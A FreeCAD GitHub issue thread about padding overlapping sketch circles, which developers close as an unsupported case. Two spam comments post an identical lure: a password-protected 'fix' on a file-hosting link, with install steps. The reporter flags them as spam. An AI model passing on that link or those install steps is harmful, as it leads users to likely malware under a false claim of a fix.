FreeCAD/FreeCAD #16083: Padding overlapping circles sometimes fail.

dinosauria123, 2024-08-27:
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Problem description

Padding overlapping circles sometimes fail.
[image]

[overlapped.zip](https://github.com/user-attachments/files/16755655/overlapped.zip)

Any helps appreciated.

### Full version info

```shell
OS: Ubuntu 24.04 LTS (ubuntu:GNOME/ubuntu-wayland)
Word size of FreeCAD: 64-bit
Version: 0.22.0dev.38553 (Git) AppImage
Build type: Release
Branch: main
Hash: 59c1ccec3e6b70f56eeee8f94d361019b84bd850
Python 3.11.9, Qt 5.15.13, Coin 4.0.2, Vtk 9.2.6, OCC 7.7.2
Locale: Japanese/Japan (ja_JP)
Installed mods: 
  * InventorLoader 1.3.0
```

### Subproject(s) affected?

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

jia6214876, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

amir1387aht, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

dinosauria123, 2024-08-27:
Spams.....

kadet1090, 2024-08-27:
This scenario is not supported, effect is undefined behavior. Nothing to fix here until we have ability to select regions created from sketch while padding.

luzpaz, 2024-08-27:
>  ability to select regions created from sketch while padding.

@kadet1090 is there an open ticket for this ?

maxwxyz, 2024-08-28:
Closing in favor of https://github.com/FreeCAD/FreeCAD/issues/12820 and closely related https://github.com/FreeCAD/FreeCAD/issues/11482

closed 2024-08-28 by maxwxyz